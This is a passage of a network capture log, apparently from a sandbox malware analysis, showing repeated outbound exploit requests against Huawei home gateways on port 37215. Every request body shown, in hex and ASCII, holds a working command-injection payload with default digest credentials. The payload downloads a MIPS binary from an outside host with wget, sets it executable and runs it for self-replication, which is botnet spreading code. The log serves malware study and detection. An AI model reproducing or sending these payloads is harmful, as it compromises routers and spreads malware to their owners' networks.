2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2107192.168.2.1544750197.161.104.17837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:22.083669901 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2108192.168.2.1539110197.140.74.20037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:22.084105968 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2109192.168.2.1557234157.4.201.4537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:22.084234953 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2110192.168.2.154577841.66.18.14637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:22.088818073 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2111192.168.2.155516441.109.82.11637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:22.110011101 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2112192.168.2.1555036113.111.28.10137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:22.110224009 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2113192.168.2.155288841.219.141.7637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:22.110243082 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2114192.168.2.153832041.114.175.15637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:22.115369081 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2115192.168.2.1557448197.248.157.5937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.180437088 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2116192.168.2.1532776157.35.146.537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.180480957 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2117192.168.2.155716047.154.194.23637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.180514097 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
